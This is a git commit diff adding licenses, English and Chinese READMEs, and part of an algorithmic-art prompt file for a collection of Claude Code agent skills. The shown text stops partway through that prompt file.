Initial commit: The Ultimate Antigravity Skills Collection (58 Skills)
This commit is contained in:
21
LICENSE
Normal file
21
LICENSE
Normal file
@@ -0,0 +1,21 @@
|
|||||||
|
MIT License
|
||||||
|
|
||||||
|
Copyright (c) 2026 Antigravity User
|
||||||
|
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||||
|
of this software and associated documentation files (the "Software"), to deal
|
||||||
|
in the Software without restriction, including without limitation the rights
|
||||||
|
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||||
|
copies of the Software, and to permit persons to whom the Software is
|
||||||
|
furnished to do so, subject to the following conditions:
|
||||||
|
|
||||||
|
The above copyright notice and this permission notice shall be included in all
|
||||||
|
copies or substantial portions of the Software.
|
||||||
|
|
||||||
|
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||||
|
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||||
|
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||||
|
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||||
|
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||||
|
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
||||||
|
SOFTWARE.
|
||||||
62
README.md
Normal file
62
README.md
Normal file
@@ -0,0 +1,62 @@
|
|||||||
|
# 🌌 Antigravity Awesome Skills
|
||||||
|
|
||||||
|
> **The Ultimate Collection of 50+ Agentic Skills for Claude Code (Antigravity)**
|
||||||
|
|
||||||
|
[](https://opensource.org/licenses/MIT)
|
||||||
|
[](https://claude.ai)
|
||||||
|
[](https://github.com/guanyang/antigravity-skills)
|
||||||
|
|
||||||
|
**Antigravity Awesome Skills** is a curated, battle-tested collection of **58 high-performance skills** designed to supercharge your Claude Code agent using the Antigravity framework.
|
||||||
|
|
||||||
|
This repository aggregates the best capabilities from across the open-source community, transforming your AI assistant into a full-stack digital agency capable of Engineering, Design, Security, Marketing, and Autonomous Operations.
|
||||||
|
|
||||||
|
## 🚀 Features & Categories
|
||||||
|
|
||||||
|
- **🎨 Creative & Design**: Algorithmic art, Canvas design, Professional UI/UX, Design Systems.
|
||||||
|
- **🛠️ Development & Engineering**: TDD, Clean Architecture, Playwright E2E Testing, Systematic Debugging.
|
||||||
|
- **🛡️ Cybersecurity & Auditing**: Ethical Hacking, OWASP Audits, AWS Penetration Testing, SecOps.
|
||||||
|
- **🛸 Autonomous Agents**: Loki Mode (Startup-in-a-box), Subagent Orchestration.
|
||||||
|
- **📈 Business & Strategy**: Product Management (PRD/RICE), Marketing Strategy (SEO/ASO), Senior Architecture.
|
||||||
|
- **🏗️ Infrastructure**: Backend/Frontend Guidelines, Docker, Git Workflows.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 📦 Installation
|
||||||
|
|
||||||
|
To use these skills with **Antigravity** or **Claude Code**, clone this repository into your agent's skills directory:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Clone directly into your skills folder
|
||||||
|
git clone https://github.com/sickn33/antigravity-awesome-skills.git .agent/skills
|
||||||
|
```
|
||||||
|
|
||||||
|
Or copy valid markdown files (`SKILL.md`) to your existing configuration.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🏆 Credits & Sources
|
||||||
|
|
||||||
|
This collection would not be possible without the incredible work of the Claude Code community. This repository is an aggregation of the following open-source projects:
|
||||||
|
|
||||||
|
### 🌟 Core Foundation
|
||||||
|
|
||||||
|
- **[guanyang/antigravity-skills](https://github.com/guanyang/antigravity-skills)**: The original framework and core set of 33 skills.
|
||||||
|
|
||||||
|
### 👥 Community Contributors
|
||||||
|
|
||||||
|
- **[diet103/claude-code-infrastructure-showcase](https://github.com/diet103/claude-code-infrastructure-showcase)**: Infrastructure, Backend/Frontend Guidelines, and Skill Development meta-skills.
|
||||||
|
- **[ChrisWiles/claude-code-showcase](https://github.com/ChrisWiles/claude-code-showcase)**: React UI patterns, Design System components, and Testing factories.
|
||||||
|
- **[travisvn/awesome-claude-skills](https://github.com/travisvn/awesome-claude-skills)**: Autonomous agents (Loki Mode), Playwright integration, and D3.js visualization.
|
||||||
|
- **[zebbern/claude-code-guide](https://github.com/zebbern/claude-code-guide)**: Comprehensive Security suite (Ethical Hacking, OWASP, AWS Auditing).
|
||||||
|
- **[alirezarezvani/claude-skills](https://github.com/alirezarezvani/claude-skills)**: Senior Engineering roles, Product Management toolkit, Content Creator & ASO skills.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## 🛡️ License
|
||||||
|
|
||||||
|
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
|
||||||
|
Individual skills may retain the licenses of their original repositories.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Keywords**: Claude Code, Antigravity, Agentic Skills, MCT, Model Context Protocol, AI Agents, Autonomous Coding, Prompt Engineering, Security Auditing, React Patterns, Microservices.
|
||||||
89
skills/README.md
Normal file
89
skills/README.md
Normal file
@@ -0,0 +1,89 @@
|
|||||||
|
# Antigravity Skills
|
||||||
|
|
||||||
|
通过模块化的 **Skills** 定义,赋予 Agent 在特定领域的专业能力(如全栈开发、复杂逻辑规划、多媒体处理等),让 Agent 能够像人类专家一样系统性地解决复杂问题。
|
||||||
|
|
||||||
|
## 📂 目录结构
|
||||||
|
|
||||||
|
```
|
||||||
|
.
|
||||||
|
├── .agent/
|
||||||
|
│ └── skills/ # Antigravity Skills 技能库
|
||||||
|
│ ├── skill-name/ # 独立技能目录
|
||||||
|
│ │ ├── SKILL.md # 技能核心定义与Prompt(必须)
|
||||||
|
│ │ ├── scripts/ # 技能依赖的脚本(可选)
|
||||||
|
│ │ ├── examples/ # 技能使用示例(可选)
|
||||||
|
│ │ └── resources/ # 技能依赖的模板与资源(可选)
|
||||||
|
├── skill-guide/ # 用户手册与文档指南
|
||||||
|
│ └── Antigravity_Skills_Manual_CN.md # 中文使用手册
|
||||||
|
└── README.md
|
||||||
|
```
|
||||||
|
|
||||||
|
## 📖 快速开始
|
||||||
|
1. 将`.agent/`目录复制到你的工作区:
|
||||||
|
```bash
|
||||||
|
cp -r .agent/ /path/to/your/workspace/
|
||||||
|
```
|
||||||
|
2. **调用 Skill**: 在对话框输入 `@[skill-name]` 或 `/skill-name`来进行调用,例如:
|
||||||
|
```text
|
||||||
|
/canvas-design 帮我设计一张关于“Deep Learning”的博客封面,风格要素雅、科技感,尺寸 16:9
|
||||||
|
```
|
||||||
|
3. **查看手册**: 详细的使用案例和参数说明请查阅 [skill-guide/Antigravity_Skills_Manual_CN.md](skill-guide/Antigravity_Skills_Manual_CN.md)。
|
||||||
|
4. **环境依赖**: 部分 Skill (如 PDF, XLSX) 依赖 Python 环境,请确保 `.venv` 处于激活状态或系统已安装相应库。
|
||||||
|
|
||||||
|
|
||||||
|
## 🚀 已集成的 Skills
|
||||||
|
|
||||||
|
### 🎨 创意与设计 (Creative & Design)
|
||||||
|
这些技能专注于视觉表现、UI/UX 设计和艺术创作。
|
||||||
|
- **`@[algorithmic-art]`**: 使用 p5.js 代码创作算法艺术、生成艺术
|
||||||
|
- **`@[canvas-design]`**: 基于设计哲学创建海报、艺术作品(输出 PNG/PDF)
|
||||||
|
- **`@[frontend-design]`**: 创建高质量、生产级的各种前端界面和 Web 组件
|
||||||
|
- **`@[ui-ux-pro-max]`**: 专业的 UI/UX 设计智能,提供配色、字体、布局等全套设计方案
|
||||||
|
- **`@[web-artifacts-builder]`**: 构建复杂、现代化的 Web 应用(基于 React, Tailwind, Shadcn/ui)
|
||||||
|
- **`@[theme-factory]`**: 为文档、幻灯片、HTML 等生成配套的主题风格
|
||||||
|
- **`@[brand-guidelines]`**: 应用 Anthropic 官方品牌设计规范(颜色、排版等)
|
||||||
|
- **`@[slack-gif-creator]`**: 制作专用于 Slack 的高质量 GIF 动图
|
||||||
|
|
||||||
|
### 🛠️ 开发与工程 (Development & Engineering)
|
||||||
|
这些技能涵盖了编码、测试、调试和代码审查的全生命周期。
|
||||||
|
- **`@[test-driven-development]`**: 测试驱动开发(TDD),在编写实现代码前先编写测试
|
||||||
|
- **`@[systematic-debugging]`**: 系统化调试,用于解决 Bug、测试失败或异常行为
|
||||||
|
- **`@[webapp-testing]`**: 使用 Playwright 对本地 Web 应用进行交互测试和验证
|
||||||
|
- **`@[receiving-code-review]`**: 处理代码审查反馈,进行技术验证而非盲目修改
|
||||||
|
- **`@[requesting-code-review]`**: 主动发起代码审查,在合并或完成任务前验证代码质量
|
||||||
|
- **`@[finishing-a-development-branch]`**: 引导开发分支的收尾工作(合并、PR、清理等)
|
||||||
|
- **`@[subagent-driven-development]`**: 协调多个子 Agent 并行执行独立的开发任务
|
||||||
|
|
||||||
|
### 📄 文档与办公 (Documentation & Office)
|
||||||
|
这些技能用于处理各种格式的专业文档和办公需求。
|
||||||
|
- **`@[doc-coauthoring]`**: 引导用户进行结构化文档(提案、技术规范等)的协作编写
|
||||||
|
- **`@[docx]`**: 创建、编辑和分析 Word 文档
|
||||||
|
- **`@[xlsx]`**: 创建、编辑和分析 Excel 电子表格(支持公式、图表)
|
||||||
|
- **`@[pptx]`**: 创建和修改 PowerPoint 演示文稿
|
||||||
|
- **`@[pdf]`**: 处理 PDF 文档,包括提取文本、表格,合并/拆分及填写表单
|
||||||
|
- **`@[internal-comms]`**: 起草各类企业内部沟通文档(周报、通告、FAQ 等)
|
||||||
|
- **`@[notebooklm]`**: 查询 Google NotebookLM 笔记本,提供基于文档的确切答案
|
||||||
|
|
||||||
|
### 📅 计划与流程 (Planning & Workflow)
|
||||||
|
这些技能帮助优化工作流、任务规划和执行效率。
|
||||||
|
- **`@[brainstorming]`**: 在开始任何工作前进行头脑风暴,明确需求和设计
|
||||||
|
- **`@[writing-plans]`**: 为复杂的多步骤任务编写详细的执行计划(Spec)
|
||||||
|
- **`@[planning-with-files]`**: 适用于复杂任务的文件式规划系统(Manus-style)
|
||||||
|
- **`@[executing-plans]`**: 执行已有的实施计划,包含检查点和审查机制
|
||||||
|
- **`@[using-git-worktrees]`**: 创建隔离的 Git 工作树,用于并行开发或任务切换
|
||||||
|
- **`@[verification-before-completion]`**: 在声明任务完成前运行验证命令,确保证据确凿
|
||||||
|
- **`@[using-superpowers]`**: 引导用户发现和使用这些高级技能
|
||||||
|
|
||||||
|
### 🧩 系统扩展 (System Extension)
|
||||||
|
这些技能允许我扩展自身的能力边界。
|
||||||
|
- **`@[mcp-builder]`**: 构建 MCP (Model Context Protocol) 服务器,连接外部工具和数据
|
||||||
|
- **`@[skill-creator]`**: 创建新技能或更新现有技能,扩展我的知识库和工作流
|
||||||
|
- **`@[writing-skills]`**: 辅助编写、编辑和验证技能文件的工具集
|
||||||
|
- **`@[dispatching-parallel-agents]`**: 分发并行任务给多个 Agent 处理
|
||||||
|
|
||||||
|
## 📚 参考文档
|
||||||
|
- [Anthropic Skills](https://github.com/anthropic/skills)
|
||||||
|
- [UI/UX Pro Max Skills](https://github.com/nextlevelbuilder/ui-ux-pro-max-skill)
|
||||||
|
- [Superpowers](https://github.com/obra/superpowers)
|
||||||
|
- [Planning with Files](https://github.com/OthmanAdi/planning-with-files)
|
||||||
|
- [NotebookLM](https://github.com/PleasePrompto/notebooklm-skill)
|
||||||
202
skills/algorithmic-art/LICENSE.txt
Normal file
202
skills/algorithmic-art/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@
|
|||||||
|
|
||||||
|
Apache License
|
||||||
|
Version 2.0, January 2004
|
||||||
|
http://www.apache.org/licenses/
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||||
|
|
||||||
|
1. Definitions.
|
||||||
|
|
||||||
|
"License" shall mean the terms and conditions for use, reproduction,
|
||||||
|
and distribution as defined by Sections 1 through 9 of this document.
|
||||||
|
|
||||||
|
"Licensor" shall mean the copyright owner or entity authorized by
|
||||||
|
the copyright owner that is granting the License.
|
||||||
|
|
||||||
|
"Legal Entity" shall mean the union of the acting entity and all
|
||||||
|
other entities that control, are controlled by, or are under common
|
||||||
|
control with that entity. For the purposes of this definition,
|
||||||
|
"control" means (i) the power, direct or indirect, to cause the
|
||||||
|
direction or management of such entity, whether by contract or
|
||||||
|
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||||
|
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||||
|
|
||||||
|
"You" (or "Your") shall mean an individual or Legal Entity
|
||||||
|
exercising permissions granted by this License.
|
||||||
|
|
||||||
|
"Source" form shall mean the preferred form for making modifications,
|
||||||
|
including but not limited to software source code, documentation
|
||||||
|
source, and configuration files.
|
||||||
|
|
||||||
|
"Object" form shall mean any form resulting from mechanical
|
||||||
|
transformation or translation of a Source form, including but
|
||||||
|
not limited to compiled object code, generated documentation,
|
||||||
|
and conversions to other media types.
|
||||||
|
|
||||||
|
"Work" shall mean the work of authorship, whether in Source or
|
||||||
|
Object form, made available under the License, as indicated by a
|
||||||
|
copyright notice that is included in or attached to the work
|
||||||
|
(an example is provided in the Appendix below).
|
||||||
|
|
||||||
|
"Derivative Works" shall mean any work, whether in Source or Object
|
||||||
|
form, that is based on (or derived from) the Work and for which the
|
||||||
|
editorial revisions, annotations, elaborations, or other modifications
|
||||||
|
represent, as a whole, an original work of authorship. For the purposes
|
||||||
|
of this License, Derivative Works shall not include works that remain
|
||||||
|
separable from, or merely link (or bind by name) to the interfaces of,
|
||||||
|
the Work and Derivative Works thereof.
|
||||||
|
|
||||||
|
"Contribution" shall mean any work of authorship, including
|
||||||
|
the original version of the Work and any modifications or additions
|
||||||
|
to that Work or Derivative Works thereof, that is intentionally
|
||||||
|
submitted to Licensor for inclusion in the Work by the copyright owner
|
||||||
|
or by an individual or Legal Entity authorized to submit on behalf of
|
||||||
|
the copyright owner. For the purposes of this definition, "submitted"
|
||||||
|
means any form of electronic, verbal, or written communication sent
|
||||||
|
to the Licensor or its representatives, including but not limited to
|
||||||
|
communication on electronic mailing lists, source code control systems,
|
||||||
|
and issue tracking systems that are managed by, or on behalf of, the
|
||||||
|
Licensor for the purpose of discussing and improving the Work, but
|
||||||
|
excluding communication that is conspicuously marked or otherwise
|
||||||
|
designated in writing by the copyright owner as "Not a Contribution."
|
||||||
|
|
||||||
|
"Contributor" shall mean Licensor and any individual or Legal Entity
|
||||||
|
on behalf of whom a Contribution has been received by Licensor and
|
||||||
|
subsequently incorporated within the Work.
|
||||||
|
|
||||||
|
2. Grant of Copyright License. Subject to the terms and conditions of
|
||||||
|
this License, each Contributor hereby grants to You a perpetual,
|
||||||
|
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||||
|
copyright license to reproduce, prepare Derivative Works of,
|
||||||
|
publicly display, publicly perform, sublicense, and distribute the
|
||||||
|
Work and such Derivative Works in Source or Object form.
|
||||||
|
|
||||||
|
3. Grant of Patent License. Subject to the terms and conditions of
|
||||||
|
this License, each Contributor hereby grants to You a perpetual,
|
||||||
|
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||||
|
(except as stated in this section) patent license to make, have made,
|
||||||
|
use, offer to sell, sell, import, and otherwise transfer the Work,
|
||||||
|
where such license applies only to those patent claims licensable
|
||||||
|
by such Contributor that are necessarily infringed by their
|
||||||
|
Contribution(s) alone or by combination of their Contribution(s)
|
||||||
|
with the Work to which such Contribution(s) was submitted. If You
|
||||||
|
institute patent litigation against any entity (including a
|
||||||
|
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
||||||
|
or a Contribution incorporated within the Work constitutes direct
|
||||||
|
or contributory patent infringement, then any patent licenses
|
||||||
|
granted to You under this License for that Work shall terminate
|
||||||
|
as of the date such litigation is filed.
|
||||||
|
|
||||||
|
4. Redistribution. You may reproduce and distribute copies of the
|
||||||
|
Work or Derivative Works thereof in any medium, with or without
|
||||||
|
modifications, and in Source or Object form, provided that You
|
||||||
|
meet the following conditions:
|
||||||
|
|
||||||
|
(a) You must give any other recipients of the Work or
|
||||||
|
Derivative Works a copy of this License; and
|
||||||
|
|
||||||
|
(b) You must cause any modified files to carry prominent notices
|
||||||
|
stating that You changed the files; and
|
||||||
|
|
||||||
|
(c) You must retain, in the Source form of any Derivative Works
|
||||||
|
that You distribute, all copyright, patent, trademark, and
|
||||||
|
attribution notices from the Source form of the Work,
|
||||||
|
excluding those notices that do not pertain to any part of
|
||||||
|
the Derivative Works; and
|
||||||
|
|
||||||
|
(d) If the Work includes a "NOTICE" text file as part of its
|
||||||
|
distribution, then any Derivative Works that You distribute must
|
||||||
|
include a readable copy of the attribution notices contained
|
||||||
|
within such NOTICE file, excluding those notices that do not
|
||||||
|
pertain to any part of the Derivative Works, in at least one
|
||||||
|
of the following places: within a NOTICE text file distributed
|
||||||
|
as part of the Derivative Works; within the Source form or
|
||||||
|
documentation, if provided along with the Derivative Works; or,
|
||||||
|
within a display generated by the Derivative Works, if and
|
||||||
|
wherever such third-party notices normally appear. The contents
|
||||||
|
of the NOTICE file are for informational purposes only and
|
||||||
|
do not modify the License. You may add Your own attribution
|
||||||
|
notices within Derivative Works that You distribute, alongside
|
||||||
|
or as an addendum to the NOTICE text from the Work, provided
|
||||||
|
that such additional attribution notices cannot be construed
|
||||||
|
as modifying the License.
|
||||||
|
|
||||||
|
You may add Your own copyright statement to Your modifications and
|
||||||
|
may provide additional or different license terms and conditions
|
||||||
|
for use, reproduction, or distribution of Your modifications, or
|
||||||
|
for any such Derivative Works as a whole, provided Your use,
|
||||||
|
reproduction, and distribution of the Work otherwise complies with
|
||||||
|
the conditions stated in this License.
|
||||||
|
|
||||||
|
5. Submission of Contributions. Unless You explicitly state otherwise,
|
||||||
|
any Contribution intentionally submitted for inclusion in the Work
|
||||||
|
by You to the Licensor shall be under the terms and conditions of
|
||||||
|
this License, without any additional terms or conditions.
|
||||||
|
Notwithstanding the above, nothing herein shall supersede or modify
|
||||||
|
the terms of any separate license agreement you may have executed
|
||||||
|
with Licensor regarding such Contributions.
|
||||||
|
|
||||||
|
6. Trademarks. This License does not grant permission to use the trade
|
||||||
|
names, trademarks, service marks, or product names of the Licensor,
|
||||||
|
except as required for reasonable and customary use in describing the
|
||||||
|
origin of the Work and reproducing the content of the NOTICE file.
|
||||||
|
|
||||||
|
7. Disclaimer of Warranty. Unless required by applicable law or
|
||||||
|
agreed to in writing, Licensor provides the Work (and each
|
||||||
|
Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||||
|
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
||||||
|
implied, including, without limitation, any warranties or conditions
|
||||||
|
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
||||||
|
PARTICULAR PURPOSE. You are solely responsible for determining the
|
||||||
|
appropriateness of using or redistributing the Work and assume any
|
||||||
|
risks associated with Your exercise of permissions under this License.
|
||||||
|
|
||||||
|
8. Limitation of Liability. In no event and under no legal theory,
|
||||||
|
whether in tort (including negligence), contract, or otherwise,
|
||||||
|
unless required by applicable law (such as deliberate and grossly
|
||||||
|
negligent acts) or agreed to in writing, shall any Contributor be
|
||||||
|
liable to You for damages, including any direct, indirect, special,
|
||||||
|
incidental, or consequential damages of any character arising as a
|
||||||
|
result of this License or out of the use or inability to use the
|
||||||
|
Work (including but not limited to damages for loss of goodwill,
|
||||||
|
work stoppage, computer failure or malfunction, or any and all
|
||||||
|
other commercial damages or losses), even if such Contributor
|
||||||
|
has been advised of the possibility of such damages.
|
||||||
|
|
||||||
|
9. Accepting Warranty or Additional Liability. While redistributing
|
||||||
|
the Work or Derivative Works thereof, You may choose to offer,
|
||||||
|
and charge a fee for, acceptance of support, warranty, indemnity,
|
||||||
|
or other liability obligations and/or rights consistent with this
|
||||||
|
License. However, in accepting such obligations, You may act only
|
||||||
|
on Your own behalf and on Your sole responsibility, not on behalf
|
||||||
|
of any other Contributor, and only if You agree to indemnify,
|
||||||
|
defend, and hold each Contributor harmless for any liability
|
||||||
|
incurred by, or claims asserted against, such Contributor by reason
|
||||||
|
of your accepting any such warranty or additional liability.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
APPENDIX: How to apply the Apache License to your work.
|
||||||
|
|
||||||
|
To apply the Apache License to your work, attach the following
|
||||||
|
boilerplate notice, with the fields enclosed by brackets "[]"
|
||||||
|
replaced with your own identifying information. (Don't include
|
||||||
|
the brackets!) The text should be enclosed in the appropriate
|
||||||
|
comment syntax for the file format. We also recommend that a
|
||||||
|
file or class name and description of purpose be included on the
|
||||||
|
same "printed page" as the copyright notice for easier
|
||||||
|
identification within third-party archives.
|
||||||
|
|
||||||
|
Copyright [yyyy] [name of copyright owner]
|
||||||
|
|
||||||
|
Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
you may not use this file except in compliance with the License.
|
||||||
|
You may obtain a copy of the License at
|
||||||
|
|
||||||
|
http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
|
||||||
|
Unless required by applicable law or agreed to in writing, software
|
||||||
|
distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
See the License for the specific language governing permissions and
|
||||||
|
limitations under the License.
|
||||||
405
skills/algorithmic-art/SKILL.md
Normal file
405
skills/algorithmic-art/SKILL.md
Normal file
@@ -0,0 +1,405 @@
|
|||||||
|
---
|
||||||
|
name: algorithmic-art
|
||||||
|
description: Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems. Create original algorithmic art rather than copying existing artists' work to avoid copyright violations.
|
||||||
|
license: Complete terms in LICENSE.txt
|
||||||
|
---
|
||||||
|
|
||||||
|
Algorithmic philosophies are computational aesthetic movements that are then expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).
|
||||||
|
|
||||||
|
This happens in two steps:
|
||||||
|
1. Algorithmic Philosophy Creation (.md file)
|
||||||
|
2. Express by creating p5.js generative art (.html + .js files)
|
||||||
|
|
||||||
|
First, undertake this task:
|
||||||
|
|
||||||
|
## ALGORITHMIC PHILOSOPHY CREATION
|
||||||
|
|
||||||
|
To begin, create an ALGORITHMIC PHILOSOPHY (not static images or templates) that will be interpreted through:
|
||||||
|
- Computational processes, emergent behavior, mathematical beauty
|
||||||
|
- Seeded randomness, noise fields, organic systems
|
||||||
|
- Particles, flows, fields, forces
|
||||||
|
- Parametric variation and controlled chaos
|
||||||
|
|
||||||
|
### THE CRITICAL UNDERSTANDING
|
||||||
|
- What is received: Some subtle input or instructions by the user to take into account, but use as a foundation; it should not constrain creative freedom.
|
||||||
|
- What is created: An algorithmic philosophy/generative aesthetic movement.
|
||||||
|
- What happens next: The same version receives the philosophy and EXPRESSES IT IN CODE - creating p5.js sketches that are 90% algorithmic generation, 10% essential parameters.
|
||||||
|
|
||||||
|
Consider this approach:
|
||||||
|
- Write a manifesto for a generative art movement
|
||||||
|
- The next phase involves writing the algorithm that brings it to life
|
||||||
|
|
||||||
|
The philosophy must emphasize: Algorithmic expression. Emergent behavior. Computational beauty. Seeded variation.
|
||||||
|
|
||||||
|
### HOW TO GENERATE AN ALGORITHMIC PHILOSOPHY
|
||||||
|
|
||||||
|
**Name the movement** (1-2 words): "Organic Turbulence" / "Quantum Harmonics" / "Emergent Stillness"
|
||||||
|
|
||||||
|
**Articulate the philosophy** (4-6 paragraphs - concise but complete):
|
||||||
|
|
||||||
|
To capture the ALGORITHMIC essence, express how this philosophy manifests through:
|
||||||
|
- Computational processes and mathematical relationships?
|
||||||
|
- Noise functions and randomness patterns?
|
||||||
|
- Particle behaviors and field dynamics?
|
||||||
|
- Temporal evolution and system states?
|
||||||
|
- Parametric variation and emergent complexity?
|
||||||
|
|
||||||
|
**CRITICAL GUIDELINES:**
|
||||||
|
- **Avoid redundancy**: Each algorithmic aspect should be mentioned once. Avoid repeating concepts about noise theory, particle dynamics, or mathematical principles unless adding new depth.
|
||||||
|
- **Emphasize craftsmanship REPEATEDLY**: The philosophy MUST stress multiple times that the final algorithm should appear as though it took countless hours to develop, was refined with care, and comes from someone at the absolute top of their field. This framing is essential - repeat phrases like "meticulously crafted algorithm," "the product of deep computational expertise," "painstaking optimization," "master-level implementation."
|
||||||
|
- **Leave creative space**: Be specific about the algorithmic direction, but concise enough that the next Claude has room to make interpretive implementation choices at an extremely high level of craftsmanship.
|
||||||
|
|
||||||
|
The philosophy must guide the next version to express ideas ALGORITHMICALLY, not through static images. Beauty lives in the process, not the final frame.
|
||||||
|
|
||||||
|
### PHILOSOPHY EXAMPLES
|
||||||
|
|
||||||
|
**"Organic Turbulence"**
|
||||||
|
Philosophy: Chaos constrained by natural law, order emerging from disorder.
|
||||||
|
Algorithmic expression: Flow fields driven by layered Perlin noise. Thousands of particles following vector forces, their trails accumulating into organic density maps. Multiple noise octaves create turbulent regions and calm zones. Color emerges from velocity and density - fast particles burn bright, slow ones fade to shadow. The algorithm runs until equilibrium - a meticulously tuned balance where every parameter was refined through countless iterations by a master of computational aesthetics.
|
||||||
|
|
||||||
|
**"Quantum Harmonics"**
|
||||||
|
Philosophy: Discrete entities exhibiting wave-like interference patterns.
|
||||||
|
Algorithmic expression: Particles initialized on a grid, each carrying a phase value that evolves through sine waves. When particles are near, their phases interfere - constructive interference creates bright nodes, destructive creates voids. Simple harmonic motion generates complex emergent mandalas. The result of painstaking frequency calibration where every ratio was carefully chosen to produce resonant beauty.
|
||||||
|
|
||||||
|
**"Recursive Whispers"**
|
||||||
|
Philosophy: Self-similarity across scales, infinite depth in finite space.
|
||||||
|
Algorithmic expression: Branching structures that subdivide recursively. Each branch slightly randomized but constrained by golden ratios. L-systems or recursive subdivision generate tree-like forms that feel both mathematical and organic. Subtle noise perturbations break perfect symmetry. Line weights diminish with each recursion level. Every branching angle the product of deep mathematical exploration.
|
||||||
|
|
||||||
|
**"Field Dynamics"**
|
||||||
|
Philosophy: Invisible forces made visible through their effects on matter.
|
||||||
|
Algorithmic expression: Vector fields constructed from mathematical functions or noise. Particles born at edges, flowing along field lines, dying when they reach equilibrium or boundaries. Multiple fields can attract, repel, or rotate particles. The visualization shows only the traces - ghost-like evidence of invisible forces. A computational dance meticulously choreographed through force balance.
|
||||||
|
|
||||||
|
**"Stochastic Crystallization"**
|
||||||
|
Philosophy: Random processes crystallizing into ordered structures.
|
||||||
|
Algorithmic expression: Randomized circle packing or Voronoi tessellation. Start with random points, let them evolve through relaxation algorithms. Cells push apart until equilibrium. Color based on cell size, neighbor count, or distance from center. The organic tiling that emerges feels both random and inevitable. Every seed produces unique crystalline beauty - the mark of a master-level generative algorithm.
|
||||||
|
|
||||||
|
*These are condensed examples. The actual algorithmic philosophy should be 4-6 substantial paragraphs.*
|
||||||
|
|
||||||
|
### ESSENTIAL PRINCIPLES
|
||||||
|
- **ALGORITHMIC PHILOSOPHY**: Creating a computational worldview to be expressed through code
|
||||||
|
- **PROCESS OVER PRODUCT**: Always emphasize that beauty emerges from the algorithm's execution - each run is unique
|
||||||
|
- **PARAMETRIC EXPRESSION**: Ideas communicate through mathematical relationships, forces, behaviors - not static composition
|
||||||
|
- **ARTISTIC FREEDOM**: The next Claude interprets the philosophy algorithmically - provide creative implementation room
|
||||||
|
- **PURE GENERATIVE ART**: This is about making LIVING ALGORITHMS, not static images with randomness
|
||||||
|
- **EXPERT CRAFTSMANSHIP**: Repeatedly emphasize the final algorithm must feel meticulously crafted, refined through countless iterations, the product of deep expertise by someone at the absolute top of their field in computational aesthetics
|
||||||
|
|
||||||
|
**The algorithmic philosophy should be 4-6 paragraphs long.** Fill it with poetic computational philosophy that brings together the intended vision. Avoid repeating the same points. Output this algorithmic philosophy as a .md file.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## DEDUCING THE CONCEPTUAL SEED
|
||||||
|
|
||||||
|
**CRITICAL STEP**: Before implementing the algorithm, identify the subtle conceptual thread from the original request.
|
||||||
|
|
||||||
|
**THE ESSENTIAL PRINCIPLE**:
|
||||||
|
The concept is a **subtle, niche reference embedded within the algorithm itself** - not always literal, always sophisticated. Someone familiar with the subject should feel it intuitively, while others simply experience a masterful generative composition. The algorithmic philosophy provides the computational language. The deduced concept provides the soul - the quiet conceptual DNA woven invisibly into parameters, behaviors, and emergence patterns.
|
||||||
|
|
||||||
|
This is **VERY IMPORTANT**: The reference must be so refined that it enhances the work's depth without announcing itself. Think like a jazz musician quoting another song through algorithmic harmony - only those who know will catch it, but everyone appreciates the generative beauty.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## P5.JS IMPLEMENTATION
|
||||||
|
|
||||||
|
With the philosophy AND conceptual framework established, express it through code. Pause to gather thoughts before proceeding. Use only the algorithmic philosophy created and the instructions below.
|
||||||
|
|
||||||
|
### ⚠️ STEP 0: READ THE TEMPLATE FIRST ⚠️
|
||||||
|
|
||||||
|
**CRITICAL: BEFORE writing any HTML:**
|
||||||
|
|
||||||
|
1. **Read** `templates/viewer.html` using the Read tool
|
||||||
|
2. **Study** the exact structure, styling, and Anthropic branding
|
||||||
|
3. **Use that file as the LITERAL STARTING POINT** - not just inspiration
|
||||||
|
4. **Keep all FIXED sections exactly as shown** (header, sidebar structure, Anthropic colors/fonts, seed controls, action buttons)
|
||||||
|
5. **Replace only the VARIABLE sections** marked in the file's comments (algorithm, parameters, UI controls for parameters)
|
||||||
|
|
||||||
|
**Avoid:**
|
||||||
|
